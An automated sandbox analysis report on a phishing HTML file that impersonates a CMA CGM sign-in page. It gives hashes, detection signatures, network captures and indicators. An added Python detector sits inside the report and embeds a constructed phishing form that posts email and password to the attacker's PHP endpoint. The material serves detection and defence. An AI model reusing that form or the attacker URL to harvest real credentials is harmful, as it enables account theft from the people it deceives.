Windows Analysis Report
Bill of Lading.htm

Overview

General Information

Sample Name: Bill of Lading.htm
Analysis ID: 656080
MD5: a6326708064aa448a2f9d842ed8af555
SHA1: 246d098d0a455ed4eba2a96f3c7489685f013345
SHA256: 4c326163765ccce65ac5fe6c707b286f9f7fdffc49d20d68a61df80f7dc72a35

Detection

HTMLPhisher
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
HTML document with suspicious title
Drops PE files
Found iframes
None HTTPS page querying sensitive user data (password, username or email)
PE file contains sections with non-standard names
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware

Classification

AV Detection

Source: Bill of Lading.htm Avira: detected
Source: Bill of Lading.htm Virustotal: Detection: 37%
Source: https://dorothearenault.com/blog/wp-includes/blocks/audio/reportcmacgm.php Avira URL Cloud: Label: phishing

Phishing

Source: Yara match File source: Bill of Lading.htm, type: SAMPLE
Source: Yara match File source: 64316.1.pages.csv, type: HTML
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: Iframe src: https://www.cma-cgm.com/Images/signin-cmacgm.jpg
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: No <meta name="copyright".. found
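The HTTP Parser hits above are the whole static case against this file: a credential form, no title and no author/copyright metadata, and an iframe that frames a real CMA CGM sign-in image so the page looks legitimate while the form itself posts elsewhere. The script below is an added example, not part of this report or of Joe Sandbox, that reproduces those checks on a constructed stand-in page and adds one generalisation the report does not state: it flags a credential form whose action host differs from the host of the framed brand asset (here www.cma-cgm.com versus the reportcmacgm.php endpoint on dorothearenault.com, which Avira URL Cloud labels phishing above). The sample HTML, the page_url default and the credential field-name list are assumptions for illustration. One caveat when reading the network section further down: the datadome.co, captcha-delivery.com and geetest.com requests are the genuine www.cma-cgm.com site's bot protection challenging the sandbox (note the DataDome 403 with X-DataDome-isbot: 1), not attacker infrastructure; the only attacker-controlled URL in the sample's strings is the reportcmacgm.php one.

```python
"""Static triage of an HTML credential-phishing page.

Reproduces the HTTP Parser indicators from the report (iframe present,
password/email/username inputs, missing <title>, missing <meta name="author">
and <meta name="copyright">, credentials requested from a non-HTTPS origin)
and adds a cross-origin check: the form posts to a host other than the brand
whose assets it frames. Added example; the sample page is constructed to
mirror the indicators in the report and is not the analysed file.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for "Bill of Lading.htm" (assumption, not the real file):
# frames a real CMA CGM image, asks for e-mail and password, and posts them to
# the PHP endpoint on the compromised WordPress site named in the report.
SAMPLE_HTML = """<html><head><meta charset="utf-8"></head><body>
<iframe src="https://www.cma-cgm.com/Images/signin-cmacgm.jpg" width="100%" height="100%"></iframe>
<form method="post" action="https://dorothearenault.com/blog/wp-includes/blocks/audio/reportcmacgm.php">
  <input type="email" name="email" placeholder="Email">
  <input type="password" name="password" placeholder="Password">
  <input type="submit" value="Sign in">
</form>
</body></html>"""

# Field names treated as credential inputs (assumed list, extend as needed).
CREDENTIAL_NAMES = {"password", "passwd", "pass", "email", "username", "user", "login"}


class PhishParser(HTMLParser):
    """Collects the elements the triage checks look at."""

    def __init__(self):
        super().__init__()
        self.title = None
        self.meta_names = set()
        self.iframe_srcs = []
        self.form_actions = []
        self.credential_inputs = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
            self.title = ""
        elif tag == "meta" and a.get("name"):
            self.meta_names.add(a["name"].lower())
        elif tag == "iframe" and a.get("src"):
            self.iframe_srcs.append(a["src"])
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            itype = (a.get("type") or "text").lower()
            name = (a.get("name") or "").lower()
            if itype in ("password", "email") or name in CREDENTIAL_NAMES:
                self.credential_inputs.append(name or itype)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def host_of(url):
    """Hostname of an absolute URL, or '' for relative/empty actions."""
    return urlsplit(url).hostname or ""


def triage(html, page_url="file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm"):
    """Return the indicator names that fire for `html` loaded from `page_url`.

    A file:// or http:// origin combined with credential fields reproduces the
    report's "None HTTPS page querying sensitive user data" signature."""
    p = PhishParser()
    p.feed(html)
    hits = []
    if not p.title:
        hits.append("html_title_missing")
    if "author" not in p.meta_names:
        hits.append("meta_author_missing")
    if "copyright" not in p.meta_names:
        hits.append("meta_copyright_missing")
    if p.iframe_srcs:
        hits.append("iframe_present")
    if p.credential_inputs:
        hits.append("credential_inputs")
        if urlsplit(page_url).scheme != "https":
            hits.append("credentials_over_non_https")
    # Generalisation: the brand whose assets are framed is not the party
    # receiving the credentials. Only fires when both sides are known hosts.
    brand_hosts = {host_of(u) for u in p.iframe_srcs} - {""}
    if p.credential_inputs and brand_hosts:
        for action in p.form_actions:
            target = host_of(action)
            if target and target not in brand_hosts:
                hits.append("form_posts_off_brand:" + target)
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_HTML):
        print(hit)
```

The checks are deliberately cheap and string-free so they run on the file before any browser touches it; the off-brand check is the one that separates this page from a legitimately framed login and is worth keeping even when the metadata checks are too noisy on its own.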
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4952_1306222165\LICENSE.txt
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: unknown HTTPS traffic detected: 152.199.21.98:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.119.57:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
Source: Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 13.224.103.115 13.224.103.115
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: Ruleset Data.0.dr String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenAccept-CH: Sec-CH-UA,Sec-CH-UA-Mobile,Sec-CH-UA-Platform,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-Device-MemoryAccept-CH: Sec-CH-UA,Sec-CH-UA-Mobile,Sec-CH-UA-Platform,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-Device-MemoryCache-Control: max-age=0, private, no-cache, no-store, must-revalidateCharset: utf-8Content-Type: text/html;charset=utf-8Date: Sat, 02 Jul 2022 22:04:41 GMTPragma: no-cacheServer: DataDomeSet-Cookie: datadome=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1; Max-Age=31536000; Domain=.cma-cgm.com; Path=/; Secure; SameSite=LaxX-DataDome: protectedX-DataDome-botfamily: bad_botX-DataDome-botname: Recent proxies suspicious server-side fingerprintX-DataDome-captchapassed: 0X-DataDome-Charset: utf-8X-DataDome-CID: AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug==X-DataDome-headers: X-DataDome Accept-CH Content-Type Charset Cache-Control Pragma Accept-CH X-DataDome-CID Set-CookieX-DataDome-isbot: 1X-DataDome-request-headers: X-DataDome-botname X-DataDome-botfamily X-DataDome-isbot X-DataDome-captchapassed X-DataDome-ruletype X-DataDome-requestidX-DataDome-requestid: dd3257bd-6ce4-921b-fe05-d2086b174fb3X-DataDome-ruletype: AI Threats DetectionX-DataDomeResponse: 403Content-Length: 531Connection: close
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr String found in binary or memory: http://llvm.org/):
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: widevinecdm.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: Bill of Lading.htm String found in binary or memory: https://auth-dev.cma-cgm.com:9031/assets/fonts/icons/mustIcons/musticons.woff
Source: Bill of Lading.htm String found in binary or memory: https://auth.cma-cgm.com/TSbd/08337f9cc5ab200098c9bf786f804c6cd4f8d35ad295482c9b58fcd74625ba236252d0
Source: Bill of Lading.htm String found in binary or memory: https://auth.cma-cgm.com/assets/images/ecom/favico/cmacgm.png
Source: Bill of Lading.htm String found in binary or memory: https://auth.cma-cgm.com/ext/pwdreset/Identify?referrer=https%3A%2F%2Fauth.cma-cgm.com%2Fidp%2F4PMLF
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json.0.dr, manifest.json2.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://content-autofill.googleapis.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, ba9fdaff-75ad-40b0-b8fd-e387f5b7b1de.tmp.1.dr, cae02159-572b-45a6-9a0e-fabb434c4db1.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://dns.google
Source: Bill of Lading.htm String found in binary or memory: https://dorothearenault.com/blog/wp-includes/blocks/audio/reportcmacgm.php
Source: LICENSE.txt.0.dr String found in binary or memory: https://easylist.to/)
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://play.google.com
Source: 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://r5---sn-4g5ednde.gvt1.com
Source: 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: Bill of Lading.htm String found in binary or memory: https://www.cma-cgm.com
Source: Bill of Lading.htm String found in binary or memory: https://www.cma-cgm.com/Images/signin-cmacgm.jpg
Source: Bill of Lading.htm String found in binary or memory: https://www.cma-cgm.com/legal-terms
Source: widevinecdm.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, craw_window.js.0.dr, craw_background.js.0.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown DNS traffic detected: queries for: accounts.google.com
Source: global traffic HTTP traffic detected: GET /TSbd/08337f9cc5ab200098c9bf786f804c6cd4f8d35ad295482c9b58fcd74625ba236252d06005b7c679?type=2 HTTP/1.1Host: auth.cma-cgm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Images/signin-cmacgm.jpg HTTP/1.1Host: www.cma-cgm.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/images/ecom/favico/cmacgm.png HTTP/1.1Host: auth.cma-cgm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Images/signin-cmacgm.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: www.cma-cgm.com
Source: global traffic HTTP traffic detected: GET /assets/images/ecom/favico/cmacgm.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: auth.cma-cgm.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.cma-cgm.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /c.js HTTP/1.1Host: ct.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cma-cgm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5 HTTP/1.1Host: geo.captcha-delivery.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.cma-cgm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/assets/tpl/6dc485c0c428c35b53577b146dc6f9179f55ef9ad41b327a2a179998839364bf/index.css HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /common/fonts/roboto/font-face.css HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
